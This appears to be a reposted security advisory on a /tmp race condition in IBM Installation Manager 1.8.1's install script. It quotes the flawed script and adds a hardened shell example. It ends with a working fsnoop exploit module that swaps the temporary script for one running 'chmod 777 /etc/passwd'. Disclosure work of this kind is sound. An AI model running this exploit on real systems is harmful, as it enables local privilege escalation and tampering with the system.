IBM Installation Manager 1.8.1 Race Condition
Source: @_larry0  Author: Cashdollar  Published: 2015-11-12
Title: /tmp race condition in IBM Installation Manager V1.8.1 install script
Author: Larry W. Cashdollar, @_larry0
Date: 2015-10-29
Download Site: http://www-03.ibm.com/software/products/en/appserv-wasfordev
Vendor: IBM
Vendor Notified: 0000-00-00
Vendor Contact:
Description: IBM Installation Manager is a command line utility to install
various software packages developed by IBM.

=====> IBM Installation Manager> Password required

Credentials are required to connect to the IBM download site. Enter IBM ID
and password.

Select:
     P. Provide credentials and connect
     C. Cancel

Select 'P' to enter credentials and connect, or 'C' to cancel.

  Forgot your IBM ID?
    https://www.ibm.com/account/profile?page=forgotuid
  Forgot your password?
    https://www.ibm.com/account/profile?page=forgot
  IBM ID help and FAQ
    https://www.ibm.com/account/profile/us/en?page=regfaqhelp
-----> C
Vulnerability:
I noticed a /tmp race condition in IBM's Installation Manager software
install script. The code in consoleinst.sh is:


 46 TEMP=/tmp
 47 tempScript=$TEMP/consoleinst-$$.sh
 48 scriptLoc=`dirname "$0"`
 49 slash=`expr "$scriptLoc" : "\(/\)"`
 50 if [ "X$slash" != "X/" ]; then
 51         scriptLoc=`pwd`/$scriptLoc
 52 fi
 53 
 54 if [ "$0" != "$tempScript" ]; then
 55     cp "$0" "$tempScript"
 56     cd "$TEMP"
 57     origScriptLoc=$scriptLoc
 58     export origScriptLoc
 59     exec "$tempScript" $@
 60     # should not return from above exec
 61     exit 1
 62 fi


If you guess the pid and create the file before the installer script does,
you can inject code that is then executed by the exec at line 59.

This is a log of me controlling permissions of the file during installation
of the product:

[M] -rwxrwxrwx 1 larry larry 34  Thu Oct 29 21:46:10 2015
/tmp/consoleinst-9999.sh
[U] -rwxrwxrwx 1 larry larry 0  Thu Oct 29 21:46:34 2015
/tmp/consoleinst-10382.sh
[U] -rwxrwxrwx 1 larry larry 2225  Thu Oct 29 21:46:34 2015
/tmp/consoleinst-10382.sh

If I'm able to write to that file directly after it's modified (inotify() for
the win), I could inject commands into that installation script.
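The root cause is that the script copies itself into a world-writable directory under a name (consoleinst-<pid>.sh) that any local user can predict and pre-create, and then exec's whatever is at that path. As an added example, not part of the advisory or of IBM's installer, the following POSIX shell shows the hardened form of that self-copy: a private directory from mktemp -d, a restrictive umask while staging, and a check that the destination is a regular file owned by the current user, so a pre-planted FIFO or symlink is refused instead of executed. The function names, the consoleinst.XXXXXX template and the demo script content are assumptions for illustration.

```shell
#!/bin/sh
# Hardened self-copy for an installer script (added example, not IBM's code).

# Refuse a destination that someone else may have planted: it must not be a
# symlink or FIFO, must be a regular file, and must be owned by us.
is_safe_target() {
    p=$1
    if [ -L "$p" ]; then return 1; fi   # symlink: target could be anything
    if [ -p "$p" ]; then return 1; fi   # named pipe (the trick used above)
    if [ ! -f "$p" ]; then return 1; fi # not a regular file
    if [ ! -O "$p" ]; then return 1; fi # not owned by the current user
    return 0
}

# Copy $1 into a fresh private directory and print the path of the copy.
# mktemp -d creates the directory with mode 0700, so no other user can
# pre-create or replace files inside it; the subshell keeps the umask local.
make_private_copy() {
    src=$1
    dst=$(
        umask 077
        dir=$(mktemp -d "${TMPDIR:-/tmp}/consoleinst.XXXXXX") || exit 1
        cp "$src" "$dir/consoleinst.sh" || exit 1
        chmod 700 "$dir/consoleinst.sh" || exit 1
        printf '%s' "$dir/consoleinst.sh"
    ) || return 1
    is_safe_target "$dst" || return 1
    printf '%s\n' "$dst"
}

# Permission string (e.g. drwx------) of a path; works with GNU and BSD ls.
mode_of() {
    ls -ld "$1" | cut -c1-10
}

# Stand-alone demo: stage a constructed script, show that a planted FIFO is
# refused, run the private copy, then clean up.
demo() {
    work=$(mktemp -d "${TMPDIR:-/tmp}/demo.XXXXXX") || exit 1
    printf '#!/bin/sh\necho "hello from the staged copy"\n' > "$work/consoleinst.sh"
    mkfifo "$work/planted"   # constructed stand-in for an attacker's FIFO
    if is_safe_target "$work/planted"; then
        echo "BUG: planted FIFO accepted"
    else
        echo "planted FIFO refused"
    fi
    copy=$(make_private_copy "$work/consoleinst.sh") && "$copy"
    ls -ld "$(dirname "$copy")" "$copy"
    rm -rf "$work" "$(dirname "$copy")"
}
if [ "${1-}" = "--demo" ]; then demo; fi
```

Run it as `sh hardened-copy.sh --demo`. When re-exec'ing the copy, pass arguments as `"$@"` rather than the unquoted `$@` used at line 59, and note that with random names the original `"$0" != "$tempScript"` guard no longer prevents recursion, so a marker environment variable is needed instead.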
CVEID:
OSVDB:
Exploit Code:
/*
fsnoop v3.3 module for exploitation of:
http://www.vapidlabs.com/advisory.php?v=156
special thanks to v14dz for getting this working, and Mudge @dotmudge for
pointing me
at his /tmp race condition tool l0pht-watch.
 
@v14dz
http://vladz.devzero.fr/
 
$ make ibm-console.so
 
/tmp/x is :
 
#!/bin/sh
chmod 777 /etc/passwd
 
$ ./fsnoop -p ibm-consoleinst.so
[+] ./ibm-consoleinst.so: ** IBM Console Install Exploit **
[+] ./ibm-consoleinst.so: payload=[0xb77775fb]
file=[/tmp/consoleinst-HEREPID.sh]
[+] ./ibm-consoleinst.so: waiting for command: "/bin/sh ./consoleinst.sh"
[+] ./ibm-consoleinst.so: Exploitation done.
[+] ./ibm-consoleinst.so: Unloading module.
 
ls -l /etc/passwd
-rwxrwxrwx 1 root root 1901 Nov 22  2014 /etc/passwd
 
*/
 
 
 
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>   /* rename() */
 
char title[] = "** IBM Console Install Exploit **";
 
/* filters: the command line fsnoop waits for, and the file it watches */
char proc_name[] = "/bin/sh ./consoleinst.sh";
char file[]      = "/tmp/consoleinst-HEREPID.sh";
 
/* Evil routines */
void payload() { 
  int fd;
/* from v14dz: I use a fifo here, to unlock the payload execution right after
the cp command */
  mkfifo(file, 0666);
  fd = open(file, O_RDONLY);   /* blocks until cp opens the fifo for writing */
  rename(file, "/tmp/a");
  rename("/tmp/x", file);      /* /tmp/x is the replacement script shown above */
  (void)fd;
}
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=156

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved